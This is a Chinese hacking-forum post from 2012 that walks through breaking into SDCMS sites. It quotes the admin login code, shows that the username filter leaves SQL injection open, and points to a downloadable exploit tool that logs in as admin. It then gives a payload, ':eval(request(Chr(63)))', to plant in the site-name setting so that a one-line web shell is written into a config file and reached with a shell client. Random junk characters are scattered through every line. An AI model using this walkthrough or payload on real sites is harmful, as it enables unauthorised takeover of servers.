作者:T00LS 鬼哥
. ^0 p8 z) X2 s6 n漏洞文件:后台目录/index.asp$ L0 A" a7 X- ]! L; p6 g! w
4 A h9 d1 E! \9 o
Sub Check7 E% O7 V4 e2 \1 p( y; m4 g
Dim username,password,code,getcode,Rs: A$ B* d2 K2 A$ m7 ]+ h; H
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
7 B9 E% q0 @+ T5 a3 y username=FilterText(Trim(Request.Form("username")),1)
; n( O- t& g& l' t3 p5 u6 D password=FilterText(Trim(Request.Form("password")),1)
1 m+ b1 N3 G3 p' \; W; D S code=Trim(Request.Form("yzm"))$ |# \* R; ~/ Z" f$ U: ?
getcode=Session("SDCMSCode")
7 @- O- D2 Y) e7 u+ d5 Y/ T3 T IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died/ K; X w: J% ]4 Y
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
' J/ ^3 g' K8 H( k) }0 P+ d IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied6 t4 v6 R5 @! f6 R% A4 }9 m( G# e6 H
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( H8 M. r1 p: m/ |- ^6 _7 V IF username="" or password="" Then
$ b D# H5 v8 Y5 c, F1 g- z Echo "用户名或密码不能为空"ied: `5 Z! M) y ^" z
Else0 G9 s2 V6 W/ _5 p" |
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")5 u9 O9 `* A3 l! M# r# X
IF Rs.Eof Then; r2 t x. P; f, M6 J1 l4 M
AddLog username,GetIp,"登录失败",1
7 ^- t$ Z" \8 {9 d: @ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
- f# K, V9 i7 s! S- e# c Else
9 }) Q' {! h6 ]+ c. H" m Add_Cookies "sdcms_id",Rs(0)
2 U0 U% l/ Y4 v3 Q" Q/ a Add_Cookies "sdcms_name",username3 g; h b! D/ Z' ^ f( K, E
Add_Cookies "sdcms_pwd",Rs(2); {) M4 A3 W/ s0 t; o/ g7 M
Add_Cookies "sdcms_admin",Rs(3); N5 v3 x& H& F1 n+ [* d
Add_Cookies "sdcms_alllever",Rs(4)
* ?! M0 W* {8 ^8 d0 e) b Add_Cookies "sdcms_infolever",Rs(5); U% F8 X" D% F# g
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
! r' p3 D- [3 Y* I9 p AddLog username,GetIp,"登录成功",1" s7 x; X; Y$ X7 F# d; _, u
'自动删除30天前的Log记录+ d9 V1 H8 G" V; r+ J
IF Sdcms_DataType Then8 | N5 x2 }& Q' L
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
- s3 K$ X* v8 @" S+ [" } Else3 R7 _; z0 c6 D8 N
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")" G* e5 M' `- z7 f) n9 T+ h
End IF
& q6 A/ y! Y- x! | Go("sdcms_index.asp")
& [% V0 }* G3 U% H' u; d7 h# F End IF
$ ~* S; f, \8 ?9 B$ D6 A0 e Rs.Close
' `7 Y2 E7 Z. t5 q% W Set Rs=Nothing+ ~0 _7 T9 Y Q
End IF
! e% i- u( M$ b* v% N- _2 }End Sub
& ~! T$ j/ q2 Q7 `9 ^3 t* {1 H) L& k1 _9 n7 ?
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码, u7 B) }. N/ P* a" A7 V
* W( t8 H! r: I6 E# Y* tFunction FilterText(ByVal t0,ByVal t1)# I9 s" H! \0 ]7 m
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function8 l( o& r: r# D& T8 v
t0=Trim(t0)5 f% |/ h: G6 {' B
Select Case t1/ t' }5 M# N! b4 z- F
Case "1"
; m4 r! `9 ~: c8 }3 C0 R% X t0=Replace(t0,Chr(32),""): E$ g% W4 Y E9 \9 q1 `8 d
t0=Replace(t0,Chr(13),"")
- b2 n$ q" F$ x8 Y1 J: B$ Q: C3 r t0=Replace(t0,Chr(10)&Chr(10),"")
8 x* }/ t# i' q( h f t0=Replace(t0,Chr(10),""); k" B# t$ _1 M& P; {
Case "2"
5 b2 c( G( N& C" q3 l0 g k: e1 A t0=Replace(t0,Chr(8),"")'回格
% d9 f9 f& u+ L/ Y. T t0=Replace(t0,Chr(9),"")'tab(水平制表符). g3 ], W/ o" E% r$ ]
t0=Replace(t0,Chr(10),"")'换行
! U1 u$ a9 H/ c) Z; B$ ?2 t h1 D t0=Replace(t0,Chr(11),"")'tab(垂直制表符)# Q8 o7 v) w9 H0 q1 V1 g5 `9 l) l. \
t0=Replace(t0,Chr(12),"")'换页1 E; [ R) I/ U9 X9 m; P9 z
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合4 @% r" j) w: d& n/ m+ N3 e
t0=Replace(t0,Chr(22),"")
( d# ? g, O4 ^, K* v* y: c t0=Replace(t0,Chr(32),"")'空格 SPACE F& M% ~8 ? y5 y# o
t0=Replace(t0,Chr(33),"")'!+ D7 P# a* B8 H' Q
t0=Replace(t0,Chr(34),"")'"1 K; @1 s& H1 v# y' w9 ^/ \
t0=Replace(t0,Chr(35),"")'#9 |1 e. R1 \2 s% k" s
t0=Replace(t0,Chr(36),"")'$+ o( W, f" n7 H4 ]) `% d
t0=Replace(t0,Chr(37),"")'%+ a {6 ^8 {( u$ l& Q6 {: P
t0=Replace(t0,Chr(38),"")'&9 `+ }. S( L3 Z+ G* q J2 z7 E1 ?% r3 ]
t0=Replace(t0,Chr(39),"")'', F) i2 B+ P3 M- L- {6 ?: N4 f
t0=Replace(t0,Chr(40),"")'(
8 Q! y( }8 c; Z u0 W9 k t0=Replace(t0,Chr(41),"")')! d# V/ H2 f( ~; }# T
t0=Replace(t0,Chr(42),"")'*
/ _3 N! i$ e& q- s; v g# a t0=Replace(t0,Chr(43),"")'+5 w, v4 B6 I# @
t0=Replace(t0,Chr(44),"")',' ^. B: j7 }$ a4 X' f3 S3 O k
t0=Replace(t0,Chr(45),"")'-
0 W N; h$ L- `* ]; G$ U$ A( \. B t0=Replace(t0,Chr(46),"")'.
0 {- i& ?2 Y8 I4 h9 A, q" _& l t0=Replace(t0,Chr(47),"")'/1 a& }% _, G! J+ ~, b+ C
t0=Replace(t0,Chr(58),"")':' x7 a, P2 {0 t B
t0=Replace(t0,Chr(59),"")';) }$ k% k5 y/ ~8 C5 Y# L! G
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>( A/ a# R3 @$ a! k* W$ e
t0=Replace(t0,Chr(63),"")'?$ h5 W- p3 k& P& D j* |4 u0 K% Z
t0=Replace(t0,Chr(64),"")'@
3 j' p1 E7 Q$ d: w; T, \ t0=Replace(t0,Chr(91),"")'\
3 N5 F5 g- k4 {, l t0=Replace(t0,Chr(92),"")'\
: j2 e! z. T2 p8 N t0=Replace(t0,Chr(93),"")']
% N- u# n, ^5 q t0=Replace(t0,Chr(94),"")'^
0 H# W: T7 p- z% m/ m% l) T t0=Replace(t0,Chr(95),"")'_
4 k: ^5 Q4 \6 ^) \2 p( ~' L t0=Replace(t0,Chr(96),"")'`- b8 M: v7 l$ A {% o2 k1 z/ W3 w
t0=Replace(t0,Chr(123),"")'{
5 o2 A. M) G K* y2 p9 V t0=Replace(t0,Chr(124),"")'|
- h; _0 f6 h* S8 V8 X t0=Replace(t0,Chr(125),"")'}# R% ]7 O4 f+ X- g0 [* S X
t0=Replace(t0,Chr(126),"")'~' m5 i7 z' x9 T, P5 l$ P v
Case Else
" v! r7 b; f" U9 C0 R: t( P7 X t0=Replace(t0, "&", "&"). j8 ~8 e* l" A" [9 Z5 l! k% |
t0=Replace(t0, "'", "'")7 q/ g J; v0 l- g4 B" Z
t0=Replace(t0, """", """)
( N' j* j" c2 i, i1 e t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
7 j f: d/ n- p3 L End Select
9 Q: m; g: [5 b8 d IF Instr(Lcase(t0),"expression")>0 Then) a- b, s6 X1 I ?' [
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)3 i9 k2 ^# G' S# p
End If
) r8 S, [9 J9 I- y: K0 k FilterText=t0
# N" q% r0 s; O$ h' J ]' pEnd Function
; y+ L1 ^" b- @
( k. C2 S- l. s* o8 I; S& x看到没。直接参数是1 只过滤
8 D" F+ m9 n/ O. H/ h$ s t0=Replace(t0,Chr(32)," ")
) Y; T5 Q/ Z% J t0=Replace(t0,Chr(13),"")
5 n2 I' W8 _- ~/ ]/ G t0=Replace(t0,Chr(10)&Chr(10),"% m; Z$ {3 I% x: l& v
"); d' E+ r! Z, E0 Y
t0=Replace(t0,Chr(10),"
1 d+ m6 X8 ~4 b) X% d( Q3 l")
% p4 f( f Y3 B2 ~& ^; P漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
: b. e3 B9 H- T1 p' F( [EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
- U5 d2 J- I* I8 n
8 i0 K, W) F( r8 B- T- y" V测试:; ~% C' Q, K* ~7 S7 L
% ^* j+ \/ C$ R- L# n" J4 n9 w1 f/ @3 y C/ x' K
现在输入工具上验证码,然后点OK
, N0 a9 A4 }. m- d+ |) [) n9 V/ y* o* W( U3 }
7 {2 j0 j7 x) `# X" c8 T看到我们直接进入后台管理界面了,呵呵!5 D" C2 B9 y$ q! |5 R
/ t" u" J7 g& A1 I V
. M+ m- W- Z: l9 \" c6 ^5 `/ T3 {
这样直接进入后台了。。。。1 c l4 x# X! \; C$ A
8 e" L, Q- ^, d5 v, r& Y5 C9 G9 N
3 C5 d: @& C1 |* v! v4 w- D
' M1 {4 `6 U; E3 V5 m, `) |! W
SDCMS提权:
) {! Z& u; H, q0 L! Y/ ~; q+ ~9 W7 q' o' O6 y4 `
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
/ w9 I2 x4 X5 s2 O4 P7 D3 e1 ?5 L q, y( e& j* x: Z# X
6 E0 e# _% t$ m7 r+ Z
" c$ g& E9 r& M# U" z7 J& cOK,现在用菜刀连接下!% ^' J7 w2 l- x' X6 t7 F4 q1 @* |3 D
' g% z0 H w, d$ p3 J$ @
G5 f. M3 |8 R
: d' ~, M" o" j5 K) l$ o
/ U/ g- H8 s0 K! s. s- g% x
1 a v; c7 D# J4 k5 h3 i |
发表于 2012-11-9 20:57:02
收藏
支持
反对